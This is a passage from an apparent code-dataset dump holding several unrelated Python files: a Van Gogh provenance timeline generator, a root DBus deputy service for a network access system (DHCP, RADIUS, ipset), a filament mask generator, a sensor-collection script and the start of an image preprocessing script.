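    # Build one travel segment for the timeline JSON; changeFlag is always 1
    # in the branches above, so it is fixed here.
    return {'line': {
        'year': int(year),
        'coordinates': list(coordinates),
        'cities': list(cities),
        'owner': list(owners),
        'changeFlag': 1,
        'dataType': data_type,
    }}

# eventSpecificRows.append(make_line(1901, [paris_xy, berlin_xy],
#                                    ['Paris', 'Berlin'],
#                                    ['Vollard', 'Cassirer'], 'provenance'))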
addExhibition('location',cities)\n\n owners = []\n addPrevProvenance('owner',owners)\n addProvenance('owner',owners)\n addExhibition('exhibition',owners)\n\n changeFlag = []\n changeFlag.append(1)\n\n dataType = []\n for cd in range(len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)])):\n dataType.append(\"exhibition\")\n dataType.append(\"provenance\")\n for cd in range(len(provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']==y)])):\n dataType.append(\"provenance\")\n\n print(len(coordinates))\n # addToJSONLine()\n\n\n ### If an exhibition spanned into the past year ##\n elif len(exhibitionHistoryList.loc[(exhibitionHistoryList['ehid'].isin(ehidList)) & (exhibitionHistoryList['year']==y-1)]) > 0:\n ### Add all exhibitions, then new ownership changing hands ###\n coordinates = []\n addExhibition('coordinates',coordinates)\n addProvenance('coordinates',coordinates)\n\n cities = []\n addExhibition('location',cities)\n addProvenance('location',cities)\n\n owners = []\n addExhibition('exhibition',owners)\n addProvenance('owner',owners)\n\n changeFlag = []\n changeFlag.append(1)\n\n dataType = []\n for cd in range(len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)])):\n dataType.append(\"exhibition\")\n for cd in range(len(provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']==y)])):\n dataType.append(\"provenance\")\n\n addToJSONLine()\n\n ### Ehibition was only in this year ###\n else:\n ### Add first owner then all exhibitions, then new ownership ###\n coordinates = []\n addPrevProvenance('coordinates',coordinates)\n addExhibition('coordinates',coordinates)\n addProvenance('coordinates',coordinates)\n\n cities = []\n addPrevProvenance('location',cities)\n addExhibition('location',cities)\n addProvenance('location',cities)\n\n owners = []\n addPrevProvenance('owner',owners)\n addExhibition('exhibition',owners)\n addProvenance('owner',owners)\n\n changeFlag = []\n changeFlag.append(1)\n\n dataType = []\n dataType.append(\"provenance\")\n for cd in range(len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)])):\n dataType.append(\"exhibition\")\n for cd in range(len(provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']==y)])):\n dataType.append(\"provenance\")\n\n addToJSONLine()\n\n\n else :\n ### This is where owners change hands once without exhibitions int that year. ###\n coordinates = []\n addPrevProvenance('coordinates',coordinates)\n addProvenance('coordinates',coordinates)\n\n cities = []\n addPrevProvenance('location',cities)\n addProvenance('location',cities)\n\n owners = []\n addPrevProvenance('owner',owners)\n addProvenance('owner',owners)\n\n changeFlag = []\n changeFlag.append(1)\n\n dataType = []\n dataType.append(\"provenance\")\n for cd in range(len(provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']==y)])):\n dataType.append(\"provenance\")\n\n addToJSONLine()\n\n ### This is where no ownership changes hands ###\n else:\n ### Is there an exhibition in this year? 
###\n if (len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)]) > 0):\n ehidList = exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y),'ehid'].unique()\n ### If an exhibition spanned into the next year ##\n if len(exhibitionHistoryList.loc[(exhibitionHistoryList['ehid'].isin(ehidList)) & (exhibitionHistoryList['year']==y+1)]) > 0:\n ## Goes from current owner to exhibitions\n coordinates = []\n addCurrentProvenance('coordinates',coordinates)\n addExhibition('coordinates',coordinates)\n\n cities = []\n addCurrentProvenance('location',cities)\n addExhibition('location',cities)\n\n owners = []\n addCurrentProvenance('owner',owners)\n addExhibition('exhibition',owners)\n\n changeFlag = []\n changeFlag.append(1)\n\n dataType = []\n dataType.append(\"provenance\")\n for cd in range(len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)])):\n dataType.append(\"exhibition\")\n\n addToJSONLine()\n\n ### If an exhibition spanned into the past year ##\n elif len(exhibitionHistoryList.loc[(exhibitionHistoryList['ehid'].isin(ehidList)) & (exhibitionHistoryList['year']==y-1)]) > 0:\n ## Goes from exhibitions back to current owner\n coordinates = []\n addExhibition('coordinates',coordinates)\n addCurrentProvenance('coordinates',coordinates)\n\n cities = []\n addExhibition('location',cities)\n addCurrentProvenance('location',cities)\n\n owners = []\n addExhibition('exhibition',owners)\n addCurrentProvenance('owner',owners)\n\n changeFlag = []\n changeFlag.append(1)\n\n dataType = []\n for cd in range(len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)])):\n dataType.append(\"exhibition\")\n dataType.append(\"provenance\")\n\n addToJSONLine()\n\n ### Ehibition was only in this year ###\n else:\n # if (objectNumber == 436525 and year == 1991):\n # print(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)])\n ## Goes from current owner to exhibitions, back to current owner\n coordinates = []\n addCurrentProvenance('coordinates',coordinates)\n addExhibition('coordinates',coordinates)\n addCurrentProvenance('coordinates',coordinates)\n\n cities = []\n addCurrentProvenance('location',cities)\n addExhibition('location',cities)\n addCurrentProvenance('location',cities)\n\n owners = []\n addCurrentProvenance('owner',owners)\n addExhibition('exhibition',owners)\n addCurrentProvenance('owner',owners)\n\n changeFlag = []\n changeFlag.append(1)\n\n dataType = []\n dataType.append(\"provenance\")\n for cd in range(len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)])):\n dataType.append(\"exhibition\")\n dataType.append(\"provenance\")\n\n addToJSONLine()\n\n else:\n pass\n ## current provenance ##\n # coordinates = []\n # addCurrentProvenance('coordinates',coordinates)\n #\n # cities = []\n # addCurrentProvenance('location',cities)\n #\n # owners = []\n # addCurrentProvenance('owner',owners)\n #\n # changeFlag = []\n # changeFlag.append(0)\n #\n # dataType = []\n # dataType.append(\"provenance\")\n #\n # addToJSONLine()\n '''\n\n'''\n 
jsonLINEExport = {\n 'objects': eventSpecificRows\n ,'imageName':imageName\n ,'objectNumber':str(objectNumber)\n }\n\n\n # print(jsonLINEExport);\n\n\n ## Export a JSON for each painting ###\n jsonExportName = 'jsonLINE2' + vanGoghProvenance['image'][index].split('.')[0] + '.json'\n jsonExportPath = os.path.join(dir,'assets/'+jsonExportName)\n js = json.dumps(jsonLINEExport)\n fp = open(jsonExportName, 'a')\n fp.write(js)\n fp.close()\n print(\"added \" + jsonExportName)\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n'''\n","sub_path":"interactivity/python/vanGogh1.py","file_name":"vanGogh1.py","file_ext":"py","file_size_in_byte":55078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"596959173","text":"\"\"\"\nDeputy daemon that provides a service via DBus for performing privileged\noperations.\n\nSome operations, such as generating configuration files, sending signals to\nother processes etc. needs certain privileges. The Deputy service runs as root\nand provides a very simple service over DBus.\n\"\"\"\nimport contextlib\nimport io\nimport logging\nimport os\nimport pwd\nimport re\nimport stat\nimport string\nimport subprocess\nimport textwrap\nfrom functools import partial\nfrom typing import Iterable, Tuple\n\nimport netaddr\nimport pkg_resources\n# noinspection PyPackageRequirements\nfrom gi.repository import GLib\nfrom pydbus import SystemBus\nfrom pydbus.bus import Bus\nfrom sqlalchemy import null\nfrom sqlalchemy.pool import StaticPool\n\nfrom hades import constants\nfrom hades.common import db\nfrom hades.common.dbus import handle_glib_error\nfrom hades.common.privileges import dropped_privileges\nfrom hades.config.loader import Config, get_config\n\nlogger = logging.getLogger(__name__)\nauth_dhcp_pwd = pwd.getpwnam(constants.AUTH_DHCP_USER)\ndatabase_pwd = pwd.getpwnam(constants.DATABASE_USER)\nradius_pwd = pwd.getpwnam(constants.RADIUS_USER)\n\n\ndef reload_systemd_unit(bus: Bus, unit: str, timeout: int = 100) -> None:\n \"\"\"\n Instruct systemd to reload a given unit.\n :param bus: A DBus Bus\n :param unit: The name of the systemd unit\n :param timeout: Timeout in milliseconds\n \"\"\"\n logger.debug(\"Instructing systemd to reload unit %s\", unit)\n try:\n systemd = bus.get('org.freedesktop.systemd1', timeout=timeout)\n manager_interface = systemd['org.freedesktop.systemd1.Manager']\n manager_interface.ReloadUnit(unit, 'fail', timeout=timeout)\n except GLib.Error as e:\n handle_glib_error(e)\n\n\ndef restart_systemd_unit(bus: Bus, unit: str, timeout: int = 100) -> None:\n \"\"\"\n Instruct systemd to restart a given unit.\n :param bus: A DBus Bus\n :param unit: The name of the systemd unit\n :param timeout: Timeout in milliseconds\n \"\"\"\n logger.debug(\"Instructing systemd to restart unit %s\", unit)\n try:\n systemd = bus.get('org.freedesktop.systemd1', timeout=timeout)\n manager_interface = systemd['org.freedesktop.systemd1.Manager']\n manager_interface.RestartUnit(unit, 'fail', timeout=timeout)\n except GLib.Error as e:\n handle_glib_error(e)\n\n\ndef generate_dhcp_host_reservations(\n hosts: Iterable[Tuple[netaddr.EUI, netaddr.IPAddress]]\n) -> Iterable[str]:\n for mac, ip in hosts:\n mac = netaddr.EUI(mac)\n mac.dialect=netaddr.mac_unix_expanded\n yield \"{0},{1}\\n\".format(mac, ip)\n\n\ndef generate_dhcp_hosts_file(\n hosts: Iterable[Tuple[netaddr.EUI, netaddr.IPAddress]]\n) -> None:\n file_name = constants.AUTH_DHCP_HOSTS_FILE\n logger.info(\"Generating DHCP hosts file %s\", file_name)\n try:\n 
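generate_dhcp_host_reservations in the entry above switches every EUI to the mac_unix_expanded dialect before formatting, which is what produces the zero-padded, colon-separated "mac,ip" lines in the hosts file. In isolation (the MAC and IP are made-up values):

import netaddr

mac = netaddr.EUI('00-1B-44-11-3A-B7')
mac.dialect = netaddr.mac_unix_expanded
print('{0},{1}'.format(mac, '10.66.1.7'))  # 00:1b:44:11:3a:b7,10.66.1.7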
with open(file_name, mode='w', encoding='ascii') as f:\n fd = f.fileno()\n os.fchown(fd, auth_dhcp_pwd.pw_uid, auth_dhcp_pwd.pw_gid)\n os.fchmod(fd, stat.S_IRUSR | stat.S_IRGRP)\n f.writelines(generate_dhcp_host_reservations(hosts))\n except OSError as e:\n logger.error(\"Error writing %s: %s\", file_name, e.strerror)\n\n\ndef generate_ipset_swap(ipset_name: str, tmp_ipset_name: str,\n ips: Iterable[netaddr.IPAddress]) -> Iterable[str]:\n yield 'create {} hash:ip -exist\\n'.format(tmp_ipset_name)\n yield 'flush {}\\n'.format(tmp_ipset_name)\n yield from map(partial('add {} {}\\n'.format, tmp_ipset_name), ips)\n yield 'swap {} {}\\n'.format(ipset_name, tmp_ipset_name)\n yield 'destroy {}\\n'.format(tmp_ipset_name)\n\n\ndef update_alternative_dns_ipset(ips: Iterable[netaddr.IPAddress]) -> None:\n conf = get_config()\n ipset_name = conf['HADES_AUTH_DNS_ALTERNATIVE_IPSET']\n tmp_ipset_name = 'tmp_' + ipset_name\n logger.info(\"Updating alternative_dns ipset (%s)\", ipset_name)\n commands = io.TextIOWrapper(io.BytesIO(), 'ascii')\n commands.writelines(generate_ipset_swap(ipset_name, tmp_ipset_name, ips))\n commands.flush()\n subprocess.run(\n [constants.IP, 'netns', 'exec', 'auth', constants.IPSET, 'restore'],\n input=commands.buffer.getvalue())\n\n\ndef generate_radius_clients(\n clients: Iterable[Tuple[str, str, str, int, str, str, str, str]]\n) -> Iterable[str]:\n escape_pattern = re.compile(r'([\"\\\\])')\n replacement = r'\\\\\\1'\n\n template = string.Template(textwrap.dedent(\"\"\"\n client $shortname {\n shortname = \"$shortname\"\n ipaddr = \"$nasname\"\n secret = \"$secret\"\n require_message_authenticator = no\n nastype = $type\n coa_server = \"$shortname\"\n }\n home_server $shortname {\n type = coa\n ipaddr = \"$nasname\"\n port = 3799\n secret = \"$secret\"\n coa {\n irt = 2\n mrt = 16\n mrc = 5\n mrd = 30\n }\n }\n \"\"\"))\n for shortname, nasname, type, ports, secret, server, community, description in clients:\n yield template.substitute(\n shortname=shortname, nasname=nasname, type=type, ports=ports,\n secret=escape_pattern.sub(replacement, secret), community=community,\n description=description)\n\n\ndef generate_radius_clients_file(\n clients: Iterable[Tuple[str, str, str, int, str, str, str, str]]\n) -> None:\n logger.info(\"Generating freeRADIUS clients configuration\")\n file_name = constants.RADIUS_CLIENTS_FILE\n try:\n with open(file_name, mode='w', encoding='ascii') as f:\n fd = f.fileno()\n os.fchown(fd, radius_pwd.pw_uid, radius_pwd.pw_gid)\n os.fchmod(fd, stat.S_IRUSR | stat.S_IRGRP)\n f.writelines(generate_radius_clients(clients))\n except OSError as e:\n logger.exception(\"Error writing %s: %s\", file_name, e.strerror)\n\n\nclass HadesDeputyService(object):\n dbus = pkg_resources.resource_string(\n __package__, 'interface.xml').decode('utf-8')\n\n def __init__(self, bus: Bus, config: Config):\n self.bus = bus\n self.config = config\n self.engine = db.create_engine(config, poolclass=StaticPool)\n original_creator = self.engine.pool._creator\n\n def creator(connection_record=None):\n \"\"\"Create a connection as the database user\"\"\"\n with dropped_privileges(database_pwd):\n connection = original_creator(connection_record)\n return connection\n\n self.engine.pool._creator = creator\n\n def Refresh(self, force: bool):\n \"\"\"\n Refresh the materialized views.\n If necessary depended config files are regenerate and the corresponding\n services are reloaded.\n \"\"\"\n logger.info(\"Refreshing materialized views\")\n with contextlib.closing(self.engine.connect()) 
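generate_ipset_swap fills a throwaway set and then swaps it with the live one, so the running firewall never sees a half-filled set. Plain string IPs work too, since the values are only formatted; assuming the function from this entry is in scope:

script = ''.join(generate_ipset_swap('alt_dns', 'tmp_alt_dns',
                                     ['10.0.0.1', '10.0.0.2']))
print(script)
# create tmp_alt_dns hash:ip -exist
# flush tmp_alt_dns
# add tmp_alt_dns 10.0.0.1
# add tmp_alt_dns 10.0.0.2
# swap alt_dns tmp_alt_dns
# destroy tmp_alt_dns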
as connection:\n with connection.begin():\n db.refresh_materialized_view(connection, db.radcheck)\n db.refresh_materialized_view(connection, db.radreply)\n db.refresh_materialized_view(connection, db.radgroupcheck)\n db.refresh_materialized_view(connection, db.radgroupreply)\n db.refresh_materialized_view(connection, db.radusergroup)\n if force:\n with connection.begin():\n db.refresh_materialized_view(connection, db.dhcphost)\n db.refresh_materialized_view(connection, db.nas)\n db.refresh_materialized_view(connection, db.alternative_dns)\n logger.info(\"Forcing reload of DHCP hosts, NAS clients and \"\n \"alternative DNS clients\")\n reload_dhcp_host = True\n reload_nas = True\n reload_alternative_dns = True\n hosts = db.get_all_dhcp_hosts(connection)\n clients = db.get_all_nas_clients(connection)\n ips = db.get_all_alternative_dns_ips(connection)\n else:\n dhcphost_diff = db.refresh_and_diff_materialized_view(\n connection, db.dhcphost, db.temp_dhcphost, [null()])\n if dhcphost_diff != ([], [], []):\n logger.info('DHCP host reservations changed '\n '(%d added, %d deleted, %d modified).',\n *map(len, dhcphost_diff))\n hosts = db.get_all_dhcp_hosts(connection)\n reload_dhcp_host = True\n else:\n reload_dhcp_host = False\n\n nas_diff = db.refresh_and_diff_materialized_view(\n connection, db.nas, db.temp_nas, [null()])\n\n if nas_diff != ([], [], []):\n logger.info('RADIUS clients changed '\n '(%d added, %d deleted, %d modified).',\n *map(len, nas_diff))\n clients = db.get_all_nas_clients(connection)\n reload_nas = True\n else:\n reload_nas = False\n\n alternative_dns_diff = db.refresh_and_diff_materialized_view(\n connection, db.alternative_dns, db.temp_alternative_dns,\n [null()])\n\n if alternative_dns_diff != ([], [], []):\n logger.info('Alternative auth DNS clients changed '\n '(%d added, %d deleted, %d modified).',\n *map(len, alternative_dns_diff))\n ips = db.get_all_alternative_dns_ips(connection)\n reload_alternative_dns = True\n else:\n reload_alternative_dns = False\n\n if reload_dhcp_host:\n generate_dhcp_hosts_file(hosts)\n reload_systemd_unit(self.bus, 'hades-auth-dhcp.service')\n if reload_nas:\n generate_radius_clients_file(clients)\n restart_systemd_unit(self.bus, 'hades-radius.service')\n if reload_alternative_dns:\n update_alternative_dns_ipset(ips)\n return \"OK\"\n\n def Cleanup(self):\n \"\"\"\n Clean up old records in the radacct and radpostauth tables.\n :return: \n \"\"\"\n logger.info(\"Cleaning up old records\")\n interval = self.config.HADES_RETENTION_INTERVAL\n with contextlib.closing(self.engine.connect()) as connection:\n db.delete_old_sessions(connection, interval)\n db.delete_old_auth_attempts(connection, interval)\n return \"OK\"\n\n\ndef run_event_loop():\n bus = SystemBus()\n logger.debug('Publishing interface %s on DBus', constants.DEPUTY_DBUS_NAME)\n config = get_config()\n bus.publish(constants.DEPUTY_DBUS_NAME, HadesDeputyService(bus, config))\n loop = GLib.MainLoop()\n loop.run()\n","sub_path":"src/hades/deputy/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":10848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"503004693","text":"\"\"\"\nMIT License\n\nCopyright (c) 2020 Max Planck Institute of Molecular Physiology\n\nAuthor: Luca Lusnig (luca.lusnig@mpi-dortmund.mpg.de)\nAuthor: Thorsten Wagner (thorsten.wagner@mpi-dortmund.mpg.de)\nAuthor: Markus Stabrin (markus.stabrin@mpi-dortmund.mpg.de)\nAuthor: Fabian Schoenfeld (fabian.schoenfeld@mpi-dortmund.mpg.de)\nAuthor: Tapu 
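run_event_loop at the end of that entry is the stock pydbus service pattern: publish an object on the system bus, then block in a GLib main loop. Stripped to a skeleton with a hypothetical bus name (the process must be allowed to own the name, which normally takes a D-Bus policy file):

from gi.repository import GLib
from pydbus import SystemBus

class Ping(object):
    """
    <node>
      <interface name='org.example.Ping'>
        <method name='Ping'>
          <arg type='s' name='reply' direction='out'/>
        </method>
      </interface>
    </node>
    """
    # pydbus reads the introspection XML from the docstring; the deputy
    # instead sets a class-level `dbus` attribute from interface.xml.

    def Ping(self):
        return 'pong'

bus = SystemBus()
bus.publish('org.example.Ping', Ping())
GLib.MainLoop().run()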
Shaikh (tapu.shaikh@mpi-dortmund.mpg.de)\nAuthor: Adnan Ali (adnan.ali@mpi-dortmund.mpg.de)\n\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\n\nfrom math import pi\nimport functools\nimport scipy.ndimage\nfrom numpy import zeros,add,repeat,arange,tile,reshape,multiply,divide,exp,fft,moveaxis,asarray\n\n\"\"\"\nI copied the following functions from https://github.com/MPI-Dortmund/LineEnhancer/blob/master/lineenhancer/line_enhancer.py\nThorsten.wagner committed 7 Sep 2018 1 parent 7f54d3d commit d8adf43b63568598c6df34b0fa6e4e67e0083733 \n\"\"\"\n\n\"\"\" order of the spline interpolation in scipy.ndimage for BICUBIC interpolation \"\"\"\nBICUBIC=3 #https://stackoverflow.com/questions/13242382/resampling-a-numpy-array-representing-an-image\n\nclass MaskStackCreator:\n\n def __init__(self, filament_width, mask_size, mask_width, angle_step, interpolation_order = BICUBIC, bright_background=False):\n self._filament_width = filament_width\n self._mask_size = mask_size\n self._mask_width = mask_width\n self._mask_stack = None\n self._mask_fft_stack = None\n self._angle_step = angle_step\n self._interpolation_order = interpolation_order\n self._bright_background = bright_background #in the java code it used 't' in 'generateMask'\n\n def get_mask_stack(self):\n return self._mask_stack\n\n def get_mask_fft_stack(self):\n\n # Only calculate it once!\n if self._mask_fft_stack is not None:\n return self._mask_fft_stack\n\n self.init()\n\n return self._mask_fft_stack\n\n def init(self):\n mask = self.calculate_mask(self._mask_size, self._filament_width, self._mask_width)\n self._mask_fft_stack = self.calculate_fourier_mask_stack_vectorized(mask, self._angle_step)\n\n def set_interpolation_order(self, order):\n self._interpolation_order = order\n\n def get_angle_step(self):\n return self._angle_step\n\n def get_mask_size(self):\n return self._mask_size\n\n ''' this is the original function\n def calculate_mask(self, mask_size, filament_width, mask_width):\n mask = np.zeros(shape=(mask_size, mask_size))\n\n x0 = mask_size / 2.0 + 0.5\n y0 = mask_size / 2.0 + 0.5\n\n sigmax = mask_width / 2.355 # full width at half maximum\n varx = sigmax * sigmax\n sigmay = filament_width / 2.355\n vary = sigmay * sigmay\n\n background_factor = 1.0\n if self._bright_background:\n background_factor = -1.0\n for i in range(0, mask_size):\n for j in range(0, mask_size):\n y = j + 0.5\n x = i + 0.5\n value = background_factor * np.pi * sigmax * (vary - np.power(y - y0, 2)) / (2 * vary * sigmay) * np.exp(\n -1.0 * (np.power(x - x0, 2) / (2 
* varx) + np.power(y - y0, 2) / (2 * vary)))\n if np.sqrt((y - y0) ** 2 + (x - x0) ** 2) > 300:\n value = 0\n mask[j, i] = value\n return mask\n '''\n\n ''' I adapted this function to match with the 'FilamentEnhancer->MaskCreator_.java' class '''\n def calculate_mask(self,mask_size, filamentwidth, maskwidth ):\n \"\"\"\n It is used to return a maskinstead of the FilamentEnhancer->MaskCreator_.java class\n the parameter 't' is now the 'self._bright_background\n :param mask_size:\n :param filamentwidth:\n :param maskwidth:\n :return:\n \"\"\"\n mask = zeros((mask_size, mask_size), dtype=float)\n\n x0 = mask_size / 2 + 0.5\n y0 = mask_size / 2 + 0.5\n sigmax = maskwidth / 2.355 # Full width at half maximum\n varx = sigmax * sigmax\n sigmay = filamentwidth / 2.355\n vary = sigmay * sigmay\n\n index_x = repeat(arange(mask_size), mask_size)\n index_y = tile(arange(mask_size), mask_size)\n pow_index_x0 = zeros((mask_size, mask_size), dtype=float)\n pow_indey_y0 = zeros((mask_size, mask_size), dtype=float)\n res_exp = zeros((mask_size, mask_size), dtype=float)\n\n if self._bright_background is False:\n index_y = reshape(index_y, (mask_size, mask_size)) + 0.5\n index_x = reshape(index_x, (mask_size, mask_size)) + 0.5\n indey_y0 = reshape(index_y, (mask_size, mask_size)) - y0\n index_x0 = reshape(index_x, (mask_size, mask_size)) - x0\n multiply(index_x0, index_x0, out=pow_index_x0)\n multiply(indey_y0, indey_y0, out=pow_indey_y0)\n\n val = zeros((mask_size, mask_size), dtype=float)\n divide(multiply(-1.0 * pi * sigmax, vary - pow_indey_y0), 2 * vary * sigmay, out=val)\n val_exp = (divide(pow_index_x0, 2 * varx) + divide(pow_indey_y0, 2 * vary)) * -1\n exp(val_exp, out=res_exp)\n multiply(val, res_exp, out=mask)\n else:\n indey_y0 = reshape(index_y, (mask_size, mask_size)) - y0\n index_x0 = reshape(index_x, (mask_size, mask_size)) - x0\n\n multiply(index_x0, index_x0, out=pow_index_x0)\n multiply(indey_y0, indey_y0, out=pow_indey_y0)\n\n val_exp = (divide(pow_index_x0, 2 * varx) + divide(pow_indey_y0, 2 * vary)) * -1\n\n exp(val_exp, out=res_exp)\n multiply(index_x0, res_exp, out=mask)\n\n value_to_add = -mask[0, 0]\n add(mask, value_to_add, out=mask)\n\n \"\"\"\n the 'fp' is the 'mask' var in the java code\n The following code is useless because it comments the multiply step\n // Normalize\n \t\tdouble sum = 0;\n \t\tfor(int x = 0; x < fp.getWidth(); x++){\n \t\t\tfor(int y = 0; y < fp.getHeight(); y++){\n \t\t\t\tsum += fp.getf(x, y);\n \t\t\t}\n \t\t}\n \t\tdouble scale = 1.0/sum;\n \t\t//fp.multiply(scale);\n \"\"\"\n return mask\n\n def rotate_and_fft(self, mask, angle):\n rot_mask = scipy.ndimage.interpolation.rotate(mask, angle, reshape=False, order=self._interpolation_order)\n return rot_mask\n\n\n def calculate_fourier_mask_stack_vectorized(self, mask, angle_step):\n\n # calculate the fft for each rotation of the mask\n # return a list of complex arrays\n\n angle_steps = range(0, 180, angle_step)\n # pool = multiprocessing.Pool()\n result = list(map(functools.partial(self.rotate_and_fft, mask), angle_steps))\n self._mask_stack = asarray(result)\n result_fft = fft.rfft2(self._mask_stack,axes=(-2,-1))\n\n result_fft = moveaxis(result_fft, 0, 2)\n\n return result_fft\n\n\n\n\n\n","sub_path":"stripper/maskStackCreator.py","file_name":"maskStackCreator.py","file_ext":"py","file_size_in_byte":7805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"405361581","text":"#!/usr/bin/python\n#coding = utf-8\n\nimport time, sys, datetime, logging, os, 
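calculate_mask assembles its x/y coordinate planes from repeat/tile/reshape; np.meshgrid builds the same grid in one call. A sketch of the plain anisotropic Gaussian on such a grid (it deliberately omits the second-derivative prefactor the original multiplies in, so it is an illustration of the vectorization, not a drop-in replacement):

import numpy as np

def gaussian_mask(size, sigma_x, sigma_y):
    # Pixel centers at i + 0.5, mask centered the same way as calculate_mask.
    y, x = np.meshgrid(np.arange(size) + 0.5, np.arange(size) + 0.5, indexing='ij')
    x0 = y0 = size / 2 + 0.5
    return np.exp(-((x - x0) ** 2 / (2 * sigma_x ** 2)
                    + (y - y0) ** 2 / (2 * sigma_y ** 2)))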
commands\nimport Adafruit_DHT\nfrom influxdb import InfluxDBClient\nimport collectionModule\n\n# workarea, which is necessary\nworkarea = 'Defaultdir'\nsys.path.append(workarea)\n\n# import the parameters\nfrom Parameters import Paras_coll\n\ndef main():\n\n num_sensors = len( Paras_coll.sensor_gpios )\n\n for n in range( num_sensors ):\n tempt_sensor = collectionModule.Collection(\n Paras_coll.measurements[n],\n Paras_coll.sensor, \n Paras_coll.sensor_gpios[n], \n Paras_coll.outputs[n]\n )\n\n tempt_sensor.run_collection()\n\nmain()\n","sub_path":"Setup/Templates/temp_runCollection.py","file_name":"temp_runCollection.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"649254463","text":"import numpy as np\nimport cv2\nimport firebase_admin\nfrom firebase_admin import credentials,firestore\n# from firebase_admin import storage\nimport pyrebase\nimport urllib\nimport urlopen\nimport keras\nimport math\nfrom firebase import Firebase\nfrom google.oauth2 import service_account\nimport openpyxl\nfrom datetime import date\nfrom PIL import Image\nimport firebase\nfrom scipy import ndimage\nimport argparse\nimport imutils\nimport orientation1\nimport segmentation\nimport os\nfrom google.cloud import storage\nimport google.auth.transport.requests\nfrom google.auth.transport.requests import AuthorizedSession\n\ndef getBestShift(img):\n cy,cx = ndimage.measurements.center_of_mass(img)\n\n rows,cols = img.shape\n shiftx = np.round(cols/2.0-cx).astype(int)\n shifty = np.round(rows/2.0-cy).astype(int)\n\n return shiftx,shifty\ndef shift(img,sx,sy):\n rows,cols = img.shape\n M = np.float32([[1,0,sx],[0,1,sy]])\n shifted = cv2.warpAffine(img,M,(cols,rows))\n return shifted\n\ndef preprocess(x):\n \n while np.sum(x[0]) == 0:\n x = x[1:]\n\n while np.sum(x[:,0]) == 0:\n x = np.delete(x,0,1)\n\n while np.sum(x[-1]) == 0:\n x = x[:-1]\n\n while np.sum(x[:,-1]) == 0:\n x = np.delete(x,-1,1)\n\n rows,cols = x.shape\n if rows > cols:\n factor = 20.0/rows\n rows = 20\n cols = int(round(cols*factor))\n x = cv2.resize(x, (cols,rows))\n else:\n factor = 20.0/cols\n cols = 20\n rows = int(round(rows*factor))\n x = cv2.resize(x, (cols, rows))\n colsPadding = (int(math.ceil((28-cols)/2.0)),int(math.floor((28-cols)/2.0)))\n rowsPadding = (int(math.ceil((28-rows)/2.0)),int(math.floor((28-rows)/2.0)))\n x = np.lib.pad(x,(rowsPadding,colsPadding),'constant')\n shiftx,shifty = getBestShift(x)\n shifted = shift(x,shiftx,shifty)\n x = shifted\n return x\n\ndef order_points(pts):\n\t# initialzie a list of coordinates that will be ordered\n\t# such that the first entry in the list is the top-left,\n\t# the second entry is the top-right, the third is the\n\t# bottom-right, and the fourth is the bottom-left\n\trect = np.zeros((4, 2), dtype = \"float32\")\n \n\t# the top-left point will have the smallest sum, whereas\n\t# the bottom-right point will have the largest sum\n\ts = pts.sum(axis = 1)\n\trect[0] = pts[np.argmin(s)]\n\trect[2] = pts[np.argmax(s)]\n \n\t# now, compute the difference between the points, the\n\t# top-right point will have the smallest difference,\n\t# whereas the bottom-left will have the largest difference\n\tdiff = np.diff(pts, axis = 1)\n\trect[1] = pts[np.argmin(diff)]\n\trect[3] = pts[np.argmax(diff)]\n \n\t# return the ordered coordinates\n\treturn rect\n\ndef four_point_transform(image, pts):\n\t# obtain a consistent order of the points and unpack them\n\t# individually\n\trect = order_points(pts)\n\t(tl, 
